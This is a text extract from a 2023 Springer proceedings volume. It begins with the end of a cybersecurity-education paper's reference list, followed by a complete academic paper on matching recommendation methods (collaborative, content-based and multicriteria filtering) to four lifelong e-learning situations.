5. CyberEdge Group LLC: Report Defense Cyberthreat (2018). https://cyber-edge.com/wp-con tent/uploads/2018/03/CyberEdge-2018-CDR.pdf 6. World Economic Forum: The Global Risks Report. http://www3.weforum.org/docs/WEF_ GRR18_Report.pdf 7. R-Vision: Information Security Projections for 2018. https://rvision.pro/en/blog-posts/pro gnozy-po-informatsionnoj-bezopasnosti-na-2018-god/ 8. Euronews: Davos 2018: A Joint Response to Global Threats. https://en.euronews.com/2018/ 01/24/davos-2018-what-are-humanitarian-organisations-bringing-to-the-world-economic 9. Zakhmatov, V.D.: Multifaceted Protection Technique (1991) 10. Manachinsky, A.Y.: Iraq: At the Epicenter of the Wars (2015) 11. Kessler, B.: The vulnerability of nuclear facilities to cyber attack. Strateg. Insights 10, 15–25 (2011) 12. North Atlantic Alliance: NATO-Ukraine Expert Consultations on Cyber Security. https:// www.nato.int/cps/en/natohq/news_61562.htm?selectedLocale=en 13. Ukrainian News: The Undeclared War in Cyberspace (2010). http://economica.com.ua/tele/ article/625008.html 14. BiZUA: The 20 Biggest Cybercrimes of the 21st Century (2015). https://bizua.org/351/20najguchnishix-kiberzlochiniv-xxi-stolittya 15. MITRE: Software: NetTraveler—ATT & CK for Enterprise. https://attack.mitre.org/software/ S0033 16. GReAT: Operation Red October as an Extensive Network of Cyber Espionage against Diplomatic and Governmental Structures. https://securelist.com/the-red-october-campaign-an-adv anced-cyber-espionage-network-targeting-diplomatic-and-government-agencies/3632/ 17. Media-DC: The largest Cyber-Attacks against Ukraine Since 2014. Infographics. https://nv. ua/eng/ukraine/events/najbilshi-kiberataki-proti-ukrajini-z-2014-roku-infografika-1438924. html 18. Unian: Mass Attack of Petya A Virus: Suspected Hackers Made First Statement. https://www.unian.net/science/2013686-massovaya-ataka-petyaa-yakobyi-stoyaschieza-virusom-hakeryi-sdelali-pervoe-zayavlenie.html 19. Today: WannaCry Attack: How to Protect Your Computer from a Dangerous Virus. https://www.segodnya.ua/lifestyle/science/ataka-wannacry-kak-zashchitit-kompyuter-otopasnogo-virusa-1020872.html 20. Burov, O., et al.: Cybersecurity in educational networks. In: Ahram, T., Karwowski, W., Vergnano, A., Leali, F., Taiar, R. (eds.) IHSI 2020. AISC, vol. 1131, pp. 359–364. Springer, Cham (2020). https://doi.org/10.1007/978-3-030-39512-4_56 21. Poroshenko, P.: The Law of Ukraine on Basic Principles of Cyber Security of Ukraine. https:// zakon.rada.gov.ua/laws/show/2163-19/print 22. Danik, Y.G., Suprunov, Y.M.: Some approaches to formation of the training system for the cyber security system of Ukraine. Collect. Sci. Pap. Sci. Inf. Inst. Inf. Sci. Ukr. 5, 5–22 (2011) 23. Minochkin, A.I.: Information struggle: Current state and expertise of expert training. Def. Bull. 2, 12–14 (2011) 24. Sysoev, V.: Analysis of the level of education and training of IT and information security professionals in Ukraine, CISM (2011) 25. Buriachok, V.L., Bogush, V.M.: Recommendations for the development and implementation of a cyber security training profile in Ukraine. Ukr. Sci. J. Inf. Secur. 20, 126–131 (2014) 26. Hu, Z., Buriachok, V., Sokolov, V.: Implementation of social engineering attack at institution of higher education. In: International Workshop on Cyber Hygiene, pp. 155–164 (2020) 27. Buriachok, V., et al.: Model of training specialists in the field of information and cyber security in higher education institutions of Ukraine. Inf. Technol. Teach. Aids. 5, 277–291 (2018)
Implementation of Active Cybersecurity Education
551
28. Costigan, S.S., Hennessy, M.A.: Cybersecurity: A Generic Reference Curriculum. https://www.nato.int/nato_static_fl2014/assets/pdf/pdf_2016_10/20161025_1610-cyb ersecurity-curriculum.pdf 29. National Research Council, National Science Education Standards. The National Academies Press, Washington (1996) 30. Dori, Y.J., et al.: Technology for active learning. Mater. Today 6(12), 44–49 (2003) 31. Martin, J., Wackerlin, D.: CDIO as a cross-discipline academic model. In: Proceedings of the 12th International CDIO Conference, pp. 986–1003 (2016) 32. Buriachok, V.L., Sokolov, V.Y.: CDIO Initiative. Kyiv (2019) 33. Sokolov, V., Taj Dini, M., Buriachok, V.: Wireless and Mobile Security: Laboratory Workshop. Kyiv (2017) 34. Buriachok, V., Sokolov, V.: Implementation of active learning in the master’s program on cybersecurity. In: Hu, Z., Petoukhov, S., Dychka, I., He, M. (eds.) ICCSEEA 2019. AISC, vol. 938, pp. 610–624. Springer, Cham (2020). https://doi.org/10.1007/978-3-030-166212_57 35. Sokolov, V.: Implementation of Global Active Learning Techniques in the Master’s Degree Program in Cyber Security 125. http://kubg.edu.ua/prouniversitet/news/podiji/5698-vprova dzhennia-innovatsiinykh-tekhnolohii-kiberbezpeky-v-universyteti.html 36. Buriachok, V.L.: Introduction to Active Learning Technologies in Borys Grinchenko Kyiv University Educational Process. http://www.yuanshihui.cn/detail/8e6847e3bb1000fa66 141bb2 37. Babich, O.M.: Student Action: A Student Leadership Competence Development Program. http://www.britishcouncil.org.ua/programmes/education/student-action-2018 38. Buriachok, V.L.: Introduction of Practice Oriented Learning Technology in Specialty 125 “Cybersecurity” into the University’s Educational Process. http://ij.kubg.edu.ua/pro-instytut/ news/podiji/943-forum-ynformatsyjna-bezpeka.html 39. Hu, Z., Buriachok, V., Bogachuk, I., Sokolov, V., Ageyev, D.: Development and operation analysis of spectrum monitoring subsystem 2.4–2.5 GHz range. In: Radivilova, T., Ageyev, D., Kryvinska, N. (eds.) Data-Centric Business and Applications. LNDECT, vol. 48, pp. 675–709. Springer, Cham (2021). https://doi.org/10.1007/978-3-030-43070-2_29 40. Carlsson, A., et al.: Remote security labs in the cloud ReSeLa. In: IEEE Global Engineering Education Conference, pp. 1–8 (2015). https://doi.org/10.1109/educon.2015.7095971
Recommendation Methods for Information Technology Support of Lifelong Learning Situations Mykhailo Savchenko(B) , Kateryna Synytsya, and Yevheniya Savchenko-Synyakova International Research and Training Center for Information Technologies and Systems, Kyiv, Ukraine [email protected]
Abstract. In a rapidly changing world, learning through life becomes an important part of personal and professional development in a formal, informal, or nonformal environment. A variety of e-learning content and activities are available to meet the learning demands of individuals. However, lifelong learners need advice or guidance in their search for learning experiences corresponding to their needs and preferences. Recommendation techniques are applied to facilitate a choice of a product by a user in different contexts, including education. They rely on the available information about users’ preferences and similarity measures for users and products and thus operate mostly within an isolated recommendation system. This research is aimed at identification of appropriate recommendation methods for intelligent e-learning support of the lifelong learner. A study reveals four types of lifelong learning situations with different primary recommendation methods in each case. A generalized schema for providing recommendations in lifelong e-learning is suggested. Keywords: Recommendation methods · information technology · e-learning support · lifelong learning · modeling
1 Introduction Although the concept of lifelong learning (LLL) has evolved, the core idea behind it remains: an individual needs to update his/her competencies obtained through formal education. The necessity to refresh or master new skills and knowledge, to develop new competencies is driven by societal and economic changes, such as transformations in technologies and industries, and changes in priorities in business and society. Learning through life, using offerings of educational organizations, but also non-formal and informal learning available from communities of learning and practice, as well as a variety of digital learning resources, changes the role and responsibility of the learners. Whereas formal education provides carefully planned and designed programs of study, non-formal and informal learning relies on a variety of sources and resources not connected, which have to be found, evaluated, and selected by the learners themselves – or with the assistance of some recommender [1]. © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 552–564, 2023. https://doi.org/10.1007/978-3-031-35467-0_33
Recommendation Methods for Information Technology Support
553
Recently, LLL is understood as a concept embracing all forms of personal and professional development taking through education, training, self-study, communication, as well as a personal learning experience and other activities [2]. In [3], LLL is seen as a voluntary and self-motivated pursuit of knowledge, which facilitates personal development, social inclusion, and employability. One of the specific features of LLL lies in the central role of a self-motivated person, who is in control of his/her learning process and voluntarily chooses learning experiences according to his/her personal goals and needs. Lifelong learners are self-determined, responsible, and skillful in learning strategies, however, may presume more attention to their learning habits, preferences, and expectations [4]. They need control over their learning process and related decision-making, and expect their individual learning path to be effective, efficient, and aligned with their previous experience [5]. An important factor for successful learning is learner’s engagement which is facilitated by the appropriate combination of learning activities, relevancy and quality of the content, and learner’s curiosity [6]. LLL is supported by open educational resources (OER) and massive open online courses (MOOC), which enable unsupervised individual learning and scheduled learning with a possibility of communication among course members respectively. MOOCs are delivered by some learning management system and thus can collect information about the learning process. OERs exist in different formats, including course materials and components of various sizes, tests and quizzes, video and audio material, educational games, and other educational software [7]. OERs may be produced by professional educators or other people sharing their knowledge and experience with others, like videos one can find on Youtube. While looking for a new learning experience, a learner could benefit from the advice about the potentially useful resource obtained from a trusted source or an agency [8, 9] that can evaluate possible options due to understanding the learner’s needs and learning habits. This kind of intelligent support could be provided by a recommendation system (RS). A RS is designed to assist in the selection of some objects which could be of interest to a certain user by processing information about previous object choices of this or similar users. The general idea behind the recommendation techniques is that people do not change their preferences, and if the users selected the same (or similar) objects in the past, their next choices will be alike. Most of the RS applications are related to sales and marketing but other fields beyond commerce are getting attention, including entertainment (choice of news [10], music, or movie [11]), travel planning [12], and education [13, 14]. Accounting for the resource recommendation in higher education enables adaptation to the expected learner’s preferences thus taking into account not only learning objectives (what to learn) but also learning styles (how to learn). The RS could be considered as an advisor supporting the decision-making based on the information about the person and experience in the field, i.e. popularity of objects, typical preferences, feedback about the objects, etc. The majority of the educational RS makes use of the information available from the learning management system, such as descriptions of learning resources, registered use of them by the learners, and learners’ features (age, gender, group, learning style, assessments). Their recommendations often
554
M. Savchenko et al.
assume the similarity of the learners within a group or studying the same discipline [15, 16]. Another potential source of information is social networks and direct feedback from the user with an evaluation of the recommendation quality. The quality of recommendations depends on the availability of relevant information which may be an issue for LLL, as the range of learning resources is wider, similarities with other users may be unclear or unknown, and information about the use of the resources is distributed. Depending on the learning goal, the recommendation algorithm may take into account professional rating, didactical features, and individual preferences and demands of the learner for successful recommendation [17]. The purpose of this work is to explore the possibilities of providing intelligent support for the lifelong learners in their choice of educational resources by the information technology implementing recommendation methods based on the available information in each situation. To do this, the LLL task should be analyzed and specific situations for recommendations identified. For the task of obtaining recommendations, these situations outline potentially available information for the selection of suitable learning resources and, therefore, they could be matched with various recommendation methods applicable in each situation. Then a recommendation framework for LLL can be created. The paper is arranged as follows. Section “Materials and methods” contains a description of the research steps, including literature research and focus group discussion that leads to the main findings. The “Results” section consists of the description of the lifelong learning situations analysis, and a schema for lifelong learning recommendation. In the “Discussion” the results are analyzed and discussed to outline further directions.
2 Materials and Methods This research combines a focus group study as a preliminary stage for the open online questionnaire distribution and literature research within full-text academic sources for 10 years period with a combination of keywords “recommendation (technique, method, system)” and “e-learning (LLL)”. Further, the research steps are described. The LLL concept embraces a wide range of learning experiences, activities, and resources which are subject to various learning strategies. As mentioned in [18], depending on the purpose of study, self-directed learners may use one of the following strategies: goal-oriented, activity-oriented, or learning-oriented. To further explore different cases of LLL in the context of potential recommendations, a set of examples was collected using social networks and through informal communication with people who reported their individual e-learning cases. The cases of LLL collected during the study, among others, include receiving a certificate for advanced teacher training in MOODLE and a badge for annual security retraining using an international distance course, studying several MOOCs both for fun and for professional development, following TEC conferences and several podcasts, learning some gardening (cooking) skills by watching YouTube videos and reading the guides, learning the history of Portugal associated with the planned trip using a range of sources in several languages, discussing a programming issue on the professional forum, playing with several resources and tools to enhance English pronunciation and listening comprehension, and the like. The collected examples were grouped according
Recommendation Methods for Information Technology Support
555
to the specified goal of the learning activity into four groups. Three of these groups could be mapped to the strategies suggested in [18]. Then a description of a LLL situation for each group was formulated. To better understand what resource features are important for their choice, a focus group comprising people of different age with some experience in e-learning was formed. The focus group members have an education level of no less than a master’s degree and belong to the research and educational community. The reason for the members’ choice was voluntary participation and the ability to work as a team to prepare guidelines for the field experiments. A basic questionnaire drafted by the researchers was offered via anonymous Google form to the focus group members who then took part in the discussion of the collected answers. To simplify the discussion, the VARK (visual-audio-reading-kinesthetic) inventory [19] and other learning style models were introduced to the focus group members, so that they were able to determine their learning styles [20]. The primary purpose of the discussion was to outline the main features of the four learning situations. Another output of the discussion was a list of recommendations that should be taken into account when conducting a large-scale study beyond the focus group. These recommendations are related to the reconstruction of the questionnaire, because style preferences and the importance of certain parameters depend on the situation. Also, they impact the recommendation schema, introducing the idea of grading the importance of information. To determine a primary recommendation method applicable for each situation, literature research has been performed using Scholar Google as a primary database. Full-text articles from academic sources (peer-reviewed journals, DOI) were considered. First, an overview of the major techniques and methods has been performed. Two main classes of recommendation techniques were considered: content-based filtering [21, 22], taking into account content structure, features, domain ontology, and collaborative filtering that relies on resource usage data and models [23, 24]. The CF method is the most popular when creating RS. This approach is based on the assumption that if person A has a similar opinion as person B on some issue, then A is more likely to have B’s opinion on a different issue than the opinion of a randomly selected person. Using the CF method, it is possible to obtain recommendations based on templates without using additional information about both subjects and users. The most convenient is high-quality explicit feedback when users directly report their interest in products. To establish recommendations, CF systems need to link two fundamentally different entities: items and users. The simplest and most popular method for comparing the similarity of vectors describing two users (attributes) is to calculate the correlation coefficient of these vectors with dimension n. In content-based RS, the algorithm consists of matching the attributes of a user’s profile, which stores preferences and interests, with the attributes of a content object to recommend new items of interest to the user [25]. This can be done using one of the well-known metrics, for example, Euclidean distance for the two vectors, which describe the two attributes.
556
M. Savchenko et al.
For model-based content filtering, recommendations are typically provided item by item by first developing a user rating model. These algorithms often use a probabilistic approach. Bayesian classifier considers each attribute and class label as (continuous or discrete) random variables. Given a record with N attributes (A1 ,A2 ,…,AN ), the goal is to predict a class Ck by finding the value of Ck that maximizes the posterior probability of the class given the data P(Ck | A1 ,A2 ,…,AN ). Applying Bayes’ theorem, P(Ck | A1 ,A2 ,…,AN ) ∝ P(A1 ,A2 ,…,AN | Ck)P(Ck). Bayesian classifier [26] is a probabilistic framework for solving classification problems. It is based on the definition of conditional probability and the Bayes theorem. One of the commonly used simulation-based methods in RS is neural networks [27]. The difference from other modeling methods consists in the absence of an explicit model and the need for constant network retraining, which works well for large collections of simple objects. Since personalized RSs are highly dependent on the context or domain in which they operate, it is impossible to take one recommender system from one context and transfer it to another context or domain [28]. Further, the application of these methods in e-learning and LLL recommendations, in particular, was explored. For this purpose, again, the analysis of publications on RS applications for LLL using Scholar Google was carried out, which showed that although several RS were reported as supporting individual self-directed learning, their effectiveness has been evaluated only within the higher education environment. Some research is focused on specific issues of information structuring or elicitation, such as the preprocessing of the information about the learning content and users, e.g., creating a taxonomy [29] of the user profiles or ontology for course content description [30]. Another approach is related to the extraction and formalization of descriptive information about the learning resource or its structure [31]. A combination of memory-based recommendation methods that seem appropriate for implementing personalized recommendations of learning activities is proposed in [32]. Learning networks in this case provide a basis for collaborative filtering. Based on the analysis of recommendation techniques and supporting methods, the primary recommendation method for each LLL situation has been suggested. Then, the main stages of LLL recommendation of learning resources were identified.
3 Results 3.1 Lifelong Learning Situations As the result of the LLL cases study, the following situations are identified: (a) Professional development. A person needs a confirmed result of the training in a certain field, e.g., web design. In this case, a recommendation is supposed to be a course or a program, containing content, activities, assignments, and assessment leading to proof of competency (diploma, badge, or certificate). (b) Personal development. A person needs to learn how to solve a problem or perform some task. A recommendation may include various types of resources for knowledge/skills acquisition, including videos for microlearning.
Recommendation Methods for Information Technology Support
557
(c) Curiosity-led study. There are many reasons for learning that has no direct connection to immediate application. It may be a hobby, an attempt to clarify details, enhance understanding or just stay aware of technological advancements. This kind of learning may be supported by various resources, from edutainment to research, passive presentations, interactive videos, games, and quizzes. The difference between this case and the previous two is that in this case the learner does not need to but wants to learn. (d) Skills reinforcement or knowledge refreshing. This is a specific situation for LLL which is not sufficiently addressed yet. It is related to the fact that whether the knowledge domain is changing or not, the mastered knowledge degrades in time and needs to be refreshed, and the skills should also be practiced to ensure the desired performance. Obviously, the learning content and strategy for this case may differ from those used for initial learning or training, thus, a different resource should be recommended. The Table 1 presents some distinct features of the situations that determine the type and source of information that is necessary for successful learning resource recommendation. Table 1. Distinct features of the situations at the LLL Situations
a
b
c
d
Learning goal
Certificate
Competence to perform a task
Cognitive satisfaction
Refreshed skills or knowledge
Resource type
LMS-based course (content, activities and assessment)
Short module to micro-lesson, with demo and activities
Micro to medium size multimedia content
A collection of micro-activities and learning content
Learner info
For pre-condition Task context
Preferences, style
Learning history, learner model
Resource info
Resource facts, data to compare
Duration, type, [style]
Source, style
Type of learning activity
Advice from
Authority
Prof. Majority
Friend or Self
Instructor and Self
Evaluation (test)
+
+
−
±
Dialog during the choice
Course details, explanation of choice, feedback
Context-related
Demo (optional)
Link to didactic reasons if needed
Recommendation
Multicriteria choice
Collaborative filtering
History-based content filtering
Model-based content filtering
558
M. Savchenko et al.
Preliminary results demonstrated that most participants prefer the freedom to choose the learning experience and the flexibility of the learning path, and the majority prefers text-based or visual resources. For a large-scale (careful) study of the potential importance of certain resource characteristics and preferred parameter values, some changes to the questionnaire were proposed. First, in order to obtain more accurate answers about the learner’s preferences, the questionnaire should begin with the indication of a particular situation or a learning goal. Second, to reduce communication time, it should be hierarchical so that less important resource features are not discussed in detail. Finally, some guidelines or examples of how to fill in the free-form questions were considered. The features of the situations described above are summarized in columns. The learning goal characterizes the reason for learning and, thus, the expected result. Typical resource type features learning resources appropriate for reaching the learning goal, although other types of resources and their combination could be considered. Information about the resource describes its characteristics important for each situation, such as correspondence to the learning style, type/amount of learning activities, or duration of the study. Similarly, learner information identifies what should be known about a person obtaining a resource recommendation. The most appropriate is shown for each case. The next line contains a description of potential recommenders in the real world, i.e. persons whose advice the learner most probably accepts, thus, outlining a similar group for a recommendation method. This information is helpful for user clustering in RS. The dialog during the choice reflects the specifics of educational recommendations compared to sales or music recommendations. The last line demonstrates the primary method for resource recommendation identified by a comparative analysis of potentially available information about the learner, advisory group (user cluster), and learning resources. As one can see, for situation (a) the resources belong to one type, but their description and ratings may be available from several sources. In other situations, the recommended resources could belong to different types, such as a module of a distance course or a video-lecture, thus, having different features which are hard to compare. Obviously, for an accurate resource recommendation, a learning objective articulated as a required competency or topic should be known, as well as some information about the learner. RS are applied to simplify the choice among a large set of similar objects. 3.2 A Recommendation Schema for Lifelong Learning As discussed above, a spectrum of methods and techniques is needed to process the information available in each case for suggesting resources for LLL. Further, the main phases of information processing are outlined. Phase 1. A Preliminary Search. Usually, an RS evaluates the resources for a user from a collection where any of these resources could be of potential interest. In LLL, learners have different interests that all together may be fulfilled by many collections and repositories. Therefore, the purpose of this phase is to determine an initial collection for the RS using a learner’s request, basic information from his/her profile, and contextual information if needed. Federated search mechanisms can be applied.
Recommendation Methods for Information Technology Support
559
Phase 2. A Preliminary Analysis. This phase is necessary to detail, enrich and normalize information before processing. Depending on the case, it might include extraction of detailed resource metadata, obtaining specific learner preference information, matching metadata vocabularies from different sources, conversion of descriptive information into a numerical data format for calculations, or normalizing resource ratings obtained from various sources. Phase 3. A Recommendation. The chosen recommendation method(s) is (are) applied using the enriched and normalized data. Models are built here that can be used both to analyze the current situation and to predict behavior in the future. The result of this phase is represented by one or several learning resources with their description and ratings of some sort. The justification of the recommendation might be requested. Phase 4. Evaluation and Collecting Feedback. The purpose of this phase is twofold: first, to evaluate the quality of the recommendation, and second, to obtain detailed feedback about the resource features that might be of interest to other learners. The recommendation of a learning resource could be considered successful if the learner accepted and used it, learned from it, and was satisfied with both the process and the result of the learning. It is possible to single out the main stages of such technology (Fig. 1). Thus, the main ideas behind the described schema are: (1) To produce a quality recommendation, the expectations of the learner in the current situation related to the learning have to be understood; (2) Instead of using all available data at once, the processing should start with the most important information and attract additional information as needed; (3) Recommendations in learning should not be intrusive or binding, i.e. the learner must be able to make his/her own decision; (4) The collection and use of different types of user data should be justified by the task.
4 Discussion Considering the LLL situations, the main challenges for intelligent support of the learning resource selection may be summarized as follows. First, lifelong learners in their learning resource choice are not bound to one organization, so the developers of RS cannot rely on the collection of resources and their evaluations created in advance in a format appropriate for processing by some recommendation method (algorithm). As the result of that, depending on a situation, a distributed search in several repositories containing different types of resources may be necessary (in contrast to the search within one collection of unified objects, as in most RS). Information about these resources consists of metadata and user evaluations. Although metadata formats are standardized, not all metadata fields are mandatory, so missing data has to be filled in by additional information extraction about the resource or compensated by other available information. The quality of resource description has a direct impact on the quality of recommendations, however, excessive information slows down processing and might have an effect of a noise.
560
M. Savchenko et al.
Fig. 1. Stages of recommendation technology in LLL
Second, collaborative filtering methods use resource evaluation by similar or trusted users. Identification of a group of potentially trusted users was depicted in the “Advice from” line. A specific procedure to determine whether a user belongs to this group is also a subject to the situation.
Recommendation Methods for Information Technology Support
561
Third, user evaluations and feedbacks about the quality of recommendations should be collected. In contrast to product recommendations which are based on binary feedback or simple ratings, more complex schema is necessary for learning resources. Finally, the ultimate goal of the LLL recommender is to support learners in their individual lifelong learning path, so their previous learning experiences should be taken into account to the possible extent, and their learning needs identified. In some educational RS, a registration mechanism provides access to the learner data from the LMS. In case of LLL, a registration mechanism could provide access to basic data and request additional data from learner profile or learner model through the learner agent. The choice of the primary recommendation methods for each specific situation (Table 1 in the last row) is driven by the following considerations: (a) Professional development – a multicriteria choice that incorporates preference information upon multiple criteria. Instead of using a single criterion value typical for RS, optimization by two or more criteria is used. This situation is similar to a usual e-learning case, thus a comparative study of some optimization methods and recommendation methods could be proposed as a separate research topic; (b) Personal development – a collaborative filtering (CF). The opinion of other learners which used a certain resource for similar learning objective will be valuable in this situation; (c) Curiosity-led study – a history-based content filtering. Unlike collaborative filtering, content-based filtering doesn’t need data from other users to create recommendations but rather relies on description of the resources’ features. Content-based recommenders can be carefully tailored to the user’s interests; (d) Skills reinforcement or knowledge refreshing – a model-based content filtering. These methods provide item recommendations by first developing a model of user ratings. Algorithms in this category can make use of a probabilistic approach to compute a potential value of an item for a user, given his/her ratings on other items. It should be noted that certain resource features may be unknown, as well as users’ characteristics. The rules for the calculation of the best fit depend on the availability of information about the user’s explicit requirements, expectations derived from his/her previous experience, preferences determined in a dialog, pedagogical rationale, and other factors. Considering the advantages and disadvantages of the RS techniques summarized in [21, 24], and a variety of methods applied to elicit additional information from available data, transform and structure it to increase the accuracy of recommendation, it seems reasonable to explore their combination. As is shown in the review [33], hybrid RS, which combines different approaches, e.g., content filtering and collaborative filtering, or ontological search support, constitute the core of recent research publications in this field. The authors also consider a smart combination of information and methods in the field of RS as a way to increase the quality of recommendations. However, the structure and methods for the experimental part of quality and accuracy evaluation should be researched and planned in advance taking into account a lifelong learning environment. It is planned that the end result of this investigation will be an information technology to support the decision of the user when choosing a learning resource. At the work of this
562
M. Savchenko et al.
technology, it may be necessary to attract new additional information about the resource or users who have previously taken this course and can be assigned to one of the user groups (according to the situation). If the recommendation received is unsatisfactory for the user, it may be necessary to involve more complex data processing methods, if the initial data allows it, which may increase the accuracy of the obtaining result. If there is not enough data for this user, the system may display information about an error or the need to attract new additional information (for example, additional filling out of questionnaires about the user’s wishes when choosing a resource).
5 Conclusions At this stage of the research, the objective was to identify and describe specific cases in which some recommendation methods can be realized in information technology providing intelligent support for lifelong learners in their choice of the learning resources. Intelligent support is understood as a recommendation similar to the one that could be provided by a person trusted by a lifelong learner. Depending on the situation, it could be his/her supervisor, a friend, or a guru in some field. The authors identified four distinct situations by collecting responses to the questionnaire and discussing the results in a small focus group of people having a lifelong learning experience. Then for each situation recommendation techniques were considered for their relevance taking into account potentially available information and the fact that, in most cases, LLL is taking place in an open environment. The novelty of the approach is in the use of the learning goal as a basis for description of specific situations related to the recommendation request that impact the choice of the primary recommendation method. The proposed general schema enables a combination of several recommendation methods and adaptation to the amount and quality of the input information. It outlines the main stages of information technology for lifelong learning recommendations, however, further elaboration is needed to identify specific requirements to components for interoperability with existing learning resources metadata and repositories and learner data. As this paper introduces the first stage of the research, it does not contain details of the RS literature analysis or a large-scale study of the lifelong learners’ preferences. Suggested types of LLL situations provide a general context for recommender construction. Due to essential differences in the amount and type of information available for selecting and recommending resources in each LLL situation, each case requires a separate study and evaluation of the recommendation methods. Further research will be focused on these issues, including the elaboration of information structure and schema of the recommendation system for lifelong learning.
References 1. Grytsenko, V.I., Kudriavtseva, S.P., Synytsya, K.M.: Learning task models in the context of education for sustainable development. Control Syst. Comput. 5, 3–16 (2020). https://doi.org/ 10.15407/csc.2020.05.003
Recommendation Methods for Information Technology Support
563
2. Salling Olesen, H.: The invention of a new language of competence – a necessary tool for a lifelong learning policy. In: Duvekot, R., Joong Kang, D., Murray, J. (eds.) Linkages of VPL: Validation of Prior Learning as a Multi-Targeted Approach for Maximising Learning Opportunities for All. EC-VPL (VP), pp. 37–44 (2014) 3. Lifelong Learning. https://www.valamis.com/hub/lifelong-learning 4. Fiedler, S.H., Väljataga, T.: Modeling the personal adult learner: the concept of PLE reinterpreted. Interact. Learn. Environ. 28(6), 658–670 (2020) 5. Moore, R.L.: Developing lifelong learning with heutagogy: contexts, critiques, and challenges. Distance Educ. 41(3), 381–401 (2020). https://doi.org/10.1080/01587919.2020.176 6949 6. Buncle, J., Anane, R., Nakayama, M.: A recommendation cascade for e-learning. In: 27th IEEE International Conference on Advanced Information Networking and Applications (AINA-2013). IEEE, pp. 740–747. Barcelona, Spain (2013). https://doi.org/10.1109/AINA. 2013.142 7. Ossiannilsson, E.: OER and OEP for access, equity, equality, quality, inclusiveness, and empowering lifelong learning. Int. J. Open Educ. Resour. 1(2), 131–154 (2019). https://doi. org/10.18278/ijoer.1.2.8 8. Dabbagh, N., Castaneda, L.: The PLE as a framework for developing agency in lifelong learning. Educ. Tech. Res. Dev. 68(6), 3041–3055 (2020). https://doi.org/10.1007/s11423020-09831-z 9. Deschênes, M.: Recommender systems to support learners’ agency in a learning context: a systematic review. Int. J. Educ. Technol. High. Educ. 17(50), 1–23 (2020) 10. Raza, S., Ding, C.: News recommender system: a review of recent progress, challenges, and opportunities. Artif. Intell. Rev. 55(1), 749–800 (2021). https://doi.org/10.1007/s10462-02110043-x 11. Kle´c, M., Wieczorkowska, A.: Music recommendation systems: a survey. In: Ras, Z.W., Wieczorkowska, A., Tsumoto, S. (eds.) Recommender Systems for Medicine and Music. SCI, vol. 946, pp. 107–118. Springer, Cham (2021). https://doi.org/10.1007/978-3-030-664 50-3_7 12. Khoshahval, S., Farnaghi, M., Taleai, M., Mansourian, A.: A personalized location-based and serendipity-oriented point of interest recommender assistant based on behavioral patterns. In: Mansourian, A., Pilesjö, P., Harrie, L., van Lammeren, R. (eds.) AGILE 2018. LNGC, pp. 271–289. Springer, Cham (2018). https://doi.org/10.1007/978-3-319-78208-9_14 13. Joy, J., Pillai, R.V.G.: Review and classification of content recommenders in e-learning environment. J. King Saud Univ. Comput. Inf. Sci. 34(9), 7670–7685 (2022). https://doi.org/10. 1016/j.jksuci.2021.06.009 14. Drachsler, H., Hummel, H., Koper, R.: Identifying the goal, user model and conditions of recommender systems for formal and informal learning. J. Digit. Inf. 10(2), 4–24 (2009) 15. Jawaheer, G., Weller, P., Kostkova, P.: Modeling user preferences in recommender systems: a classification framework for explicit and implicit user feedback. ACM Trans. Interact. Intell. Syst. 4(2), 1–26 (2014) 16. Khosravi, H., Kitto, K., Williams, J.J.: RiPPLE: a crowdsourced adaptive platform for recommendation of learning activities. J. Learn. Anal. 6(3), 1–10 (2019). https://arxiv.org/pdf/ 1910.05522.pdf 17. Bulathwela, S., Perez-Ortiz, M., Yilmaz, E., Shawe-Taylor, J.: Towards an integrative educational recommender for lifelong learners. In: Proceedings of the AAAI Conference on Artificial Intelligence, vol. 34, no: 10, pp. 13759–13760 (2020) 18. Lalitha, T.B., Sreeja, P.S.: Personalised self-directed learning recommendation system. Procedia Comput. Sci. 171, 583–592 (2020) 19. The VARK Questionnaire. https://vark-learn.com/the-vark-questionnaire/
564
M. Savchenko et al.
20. Zagulova, D., Boltunova, V., Katalnikova, S., et al.: Personalized e-learning: relation between Felder-Silverman model and academic performance. Appl. Comput. Syst. 24(1), 25–31 (2019) 21. Isinkaye, F.O., Folajimi, Y.O., Ojokoh, B.A.: Recommendation systems: principles, methods and evaluation. Egypt. Inform. J. 16(3), 261–273 (2015). https://doi.org/10.1016/j.eij.2015. 06.005 22. Shu, J., Shen, X., Liu, H., Yi, B., Zhang, Z.: A content-based recommendation algorithm for learning resources. Multimedia Syst. 24(2), 163–173 (2017). https://doi.org/10.1007/s00530017-0539-8 23. Koren, Y., Bell, R.: Advances in collaborative filtering. In: Ricci, F., Rokach, L., Shapira, B. (eds.) Recommender Systems Handbook, pp. 77–118. Springer, Boston, MA (2015). https:// doi.org/10.1007/978-1-4899-7637-6_3 24. Kunaver, M., Požrl, T.: Diversity in recommender systems – a survey. Knowl.-Based Syst. 123, 154–162 (2017) 25. Deshpande, M., Karypis, G.: Item-based top-N recommendation algorithms. ACM Trans. Inf. Syst. 22(1), 143–177 (2004) 26. Cheng, J., Greiner, R.: Comparing Bayesian network classifiers. arXiv preprint arXiv:1301.6684 (2013). https://arxiv.org/ftp/arxiv/papers/1301/1301.6684.pdf 27. Gao, C., Wang, X., He, X., Li, Y.: Graph neural networks for recommender system. In: Proceedings of the Fifteenth ACM International Conference on Web Search and Data Mining, pp. 1623–1625 (2022) 28. Kulkarni, P.V., Rai, S., Kale, R.: Recommender system in elearning: a survey. In: Bhalla, S., Kwan, P., Bedekar, M., Phalnikar, R., Sirsikar, S. (eds.) Proceeding of International Conference on Computational Science and Applications. AIS, pp. 119–126. Springer, Singapore (2020). https://doi.org/10.1007/978-981-15-0790-8_13 29. Ponte, M.C.U., Zorilla, A.M., Ruiz, I.O.: Taxonomy-based hybrid recommendation system for lifelong learning to improve professional skills. In: 2020 IEEE International Conference on Teaching, Assessment, and Learning for Engineering (TALE), pp. 595–600 (2020) 30. Urdaneta-Ponte, M.C., Méndez-Zorrilla, A., Oleagordia-Ruiz, I.: Lifelong learning courses recommendation system to improve professional skills using ontology and machine learning. Adv. Technol. Lifelong Learn. 11, 3839 (2021). https://doi.org/10.3390/app11093839 31. Wan, S., Niu, Z.: An e-learning recommendation approach based on the self-organization of learning resource. Knowl.-Based Syst. 160, 71–87 (2018) 32. Drachsler, H., Hummel, H.G.K., Koper, R.: Personal recommender systems for learners in lifelong learning networks: the requirements, techniques and model. Int. J. Learn. Technol. 3(4), 404–423 (2008). 